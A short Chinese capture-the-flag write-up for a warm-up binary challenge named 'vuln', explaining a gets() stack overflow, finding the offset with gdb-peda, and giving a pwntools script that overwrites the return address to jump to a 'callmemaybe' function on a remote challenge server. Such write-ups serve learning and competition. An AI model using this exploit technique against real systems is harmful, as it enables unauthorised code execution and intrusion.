首先是第一题vuln是一道签到题

看了发现gets函数可以溢出
然后在看看有什么可用的函数发现了一个callmemaybe的函数跳到那个函数就可以了
可以看见溢出跳到这个函数就可以了,具体的溢出点的寻找可以利用gdb-peda里的pattern create 数量
然后输入后pattern offset 地址就可以找到溢出点的偏移量了。
from pwn import *
#p=process('./vuln.dms')
p = remote('139.59.30.165',8700)
#gdb.attach(p,"b main")
payload = 'a'* 40 + p64(0x400766)
p.recvuntil('>>>')
p.sendline(payload)
p.interactive()